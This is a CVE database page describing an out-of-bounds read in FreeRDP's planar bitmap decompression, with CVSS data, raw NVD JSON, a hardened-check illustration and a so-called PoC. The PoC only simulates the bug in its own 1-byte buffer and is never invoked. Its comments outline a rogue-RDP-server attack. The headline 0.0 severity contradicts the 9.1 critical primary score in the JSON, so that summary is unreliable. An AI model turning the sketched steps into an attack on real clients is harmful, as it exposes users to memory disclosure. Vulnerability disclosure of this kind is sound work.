Security Vulnerability Report
CVE-2026-31897 CVSS 0.0 NONE

CVE-2026-31897

Published: 2026-03-13 19:54:38
Last Modified: 2026-03-17 12:57:01

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in freerdp_bitmap_decompress_planar when SrcSize is 0. The function dereferences *srcp (which points to pSrcData) without first verifying that SrcSize >= 1. When SrcSize is 0 and pSrcData is non-NULL, this reads one byte past the end of the source buffer. This vulnerability is fixed in 3.24.0.
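
The missing check described above, as an added example that is not FreeRDP's code or its patch: the unchecked first-byte read beside a version that rejects SrcSize < 1 before dereferencing. Function and struct names are hypothetical, and the header bit layout is taken from the MS-RDPEGDI RDP6_BITMAP_STREAM FormatHeader rather than from this page.

```c
/* Added illustration, not FreeRDP source. Names other than pSrcData and
 * SrcSize are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* FormatHeader bit layout per MS-RDPEGDI RDP6_BITMAP_STREAM. */
typedef struct {
    uint8_t cll; /* color loss level, bits 0-2 */
    bool cs;     /* chroma subsampling, bit 3 */
    bool rle;    /* planes are RLE-compressed, bit 4 */
    bool na;     /* no alpha plane, bit 5 */
} planar_header;

/* Pattern from the description: the first byte is read with no size check,
 * so SrcSize == 0 reads one byte past the valid data. */
static uint8_t first_byte_unchecked(const uint8_t* pSrcData, size_t SrcSize)
{
    const uint8_t* srcp = pSrcData;
    (void)SrcSize; /* never consulted before the dereference */
    return *srcp;
}

/* Hardened form: reject NULL or empty input before touching the buffer. */
static bool parse_header_checked(const uint8_t* pSrcData, size_t SrcSize,
                                 planar_header* out, size_t* consumed)
{
    if (!pSrcData || !out || !consumed || SrcSize < 1)
        return false;
    const uint8_t fh = pSrcData[0];
    out->cll = fh & 0x07;
    out->cs = (fh & 0x08) != 0;
    out->rle = (fh & 0x10) != 0;
    out->na = (fh & 0x20) != 0;
    *consumed = 1; /* later reads must be checked against SrcSize - 1 */
    return true;
}

int main(void)
{
    const uint8_t stream[] = { 0x30, 0x00 }; /* constructed: RLE and NA set */
    planar_header h;
    size_t used = 0;
    printf("size 0 accepted: %d\n", parse_header_checked(stream, 0, &h, &used));
    printf("size 2 accepted: %d\n", parse_header_checked(stream, sizeof(stream), &h, &used));
    printf("unchecked, valid size: 0x%02x\n", first_byte_unchecked(stream, sizeof(stream)));
    return 0;
}
```

Building a harness like this with -fsanitize=address makes the unchecked variant report the read when it is handed a zero-length heap buffer, which is a quick way to confirm that a guard is in place.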

CVSS Details

CVSS Score: 0.0
Severity: NONE
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:* - VULNERABLE
FreeRDP < 3.24.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-31897 PoC - Malicious RDP Server Trigger
// This PoC demonstrates triggering OOB read in freerdp_bitmap_decompress_planar
// Compile: gcc -o poc poc.c -lfreerdp2
#include <stdio.h>
#include <stdlib.h>
#include <freerdp/freerdp.h>
#include <winpr/wtypes.h>

// Trigger condition: SrcSize = 0 with non-NULL pSrcData
// The vulnerable function will read one byte past pSrcData buffer
void trigger_oob_read(rdpContext* context)
{
    (void)context; // unused in this simulation

    // Simulate the vulnerable code path
    BYTE* pSrcData = (BYTE*)malloc(1); // 1-byte buffer
    if (!pSrcData)
        return;
    UINT32 SrcSize = 0; // Zero size triggers OOB read
    (void)SrcSize;      // never checked, which is the bug being modelled
    BYTE* srcp = pSrcData;

    // This line causes OOB read when SrcSize is 0:
    // the byte lies past the end of the 0 valid bytes declared by SrcSize
    // (the 1-byte allocation keeps this simulation inside allocated memory)
    BYTE firstByte = *srcp;
    printf("Triggered OOB read, got byte: 0x%02x\n", firstByte);
    free(pSrcData);
}

// For actual exploitation, setup malicious RDP server:
// 1. Start rogue RDP server on attacker machine
// 2. Send crafted bitmap decompression request with SrcSize=0
// 3. Victim FreeRDP client processes malformed packet
// 4. OOB read occurs in freerdp_bitmap_decompress_planar
int main(void)
{
    printf("CVE-2026-31897 PoC\n");
    printf("Target: FreeRDP < 3.24.0\n");
    printf("Vulnerability: OOB read in freerdp_bitmap_decompress_planar\n");
    return 0;
}

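References

https://github.com/FreeRDP/FreeRDP/commit/cd27c8faca0eeb0d4309cc5837dfdf3c42eba4e7 (Patch)
https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-xgv6-r22m-7c9x (Exploit, Patch, Vendor Advisory)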

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31897", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:38.023", "lastModified": "2026-03-17T12:57:00.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in freerdp_bitmap_decompress_planar when SrcSize is 0. The function dereferences *srcp (which points to pSrcData) without first verifying that SrcSize >= 1. When SrcSize is 0 and pSrcData is non-NULL, this reads one byte past the end of the source buffer. This vulnerability is fixed in 3.24.0."}, {"lang": "es", "value": "FreeRDP es una implementación gratuita del Protocolo de Escritorio Remoto. Antes de la versión 3.24.0, existe una lectura fuera de límites en freerdp_bitmap_decompress_planar cuando SrcSize es 0. La función desreferencia *srcp (que apunta a pSrcData) sin verificar primero que SrcSize &gt;= 1. Cuando SrcSize es 0 y pSrcData no es NULL, esto lee un byte más allá del final del búfer de origen. 
Esta vulnerabilidad se corrige en la versión 3.24.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 0.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.24.0", "matchCriteriaId": "97FCA262-35C3-4B6B-A321-15CE780FCA20"}]}]}], "references": [{"url": "https://github.com/FreeRDP/FreeRDP/commit/cd27c8faca0eeb0d4309cc5837dfdf3c42eba4e7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-xgv6-r22m-7c9x", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}